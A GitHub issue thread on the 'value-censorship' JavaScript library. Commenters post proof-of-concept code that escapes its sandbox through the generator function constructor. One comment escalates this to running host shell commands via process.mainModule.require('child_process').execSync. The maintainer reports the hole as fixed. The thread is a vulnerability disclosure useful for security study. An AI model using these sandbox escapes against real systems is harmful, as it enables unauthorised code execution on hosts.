### ISSUE TITLE
This library can be bypassed using the Generator constructor

### ISSUE THREAD

**Issue by ethernet8023** [fabiosantoscode/value-censorship#1]
I haven't managed to get `require` back into scope yet, though.
```
const censor = require('value-censorship')

censor(`
function bypass(code) {
  ((function*(){}).constructor(code))().next()
}
bypass("console.log(eval('666'))")
bypass("try { throw new Error('bypassed') } catch (e) { console.log(e)}")
bypass("console.log(new Function())")
`
)
```

**Comment by fabiosantoscode** [comment]
Is the generator constructor a second function constructor?

Also do you think it would be useful to censor property access to global objects? If some standard defines a new function that calls eval, but is in Promise.somethijg for example, it would allow to break out

**Comment by ethernet8023** [comment]
Yes, it's a second function constructor.
Even if you do 
`Object.getPrototypeOf(function*(){}).constructor = null`, 
it won't overwrite it :/
I'm not sure if there's any way around it.

**Comment by fabiosantoscode** [comment]
I'm happy with checking for it as well as the rest of the things. Closing the issue as it has been resolved. Thank you very much, and stick around ;)

**Comment by pwn1sher** [comment]
Nice find @arilotter , i was able to leverage this to escape out of the sandbox and execute commands on the host. Getting require was simple, since process is not checked for

```javascript
const censor = require('value-censorship')

censor(`
function bypass(code) {
  ((function*(){}).constructor(code))().next()
}

const code = 'console.log(process.mainModule.require("child_process").execSync("id").toString())'
bypass(code);
`)
````

Post 1.1.0 version , direct access to process is not allowed, maybe this is because Vm2 blocked process at that same time.
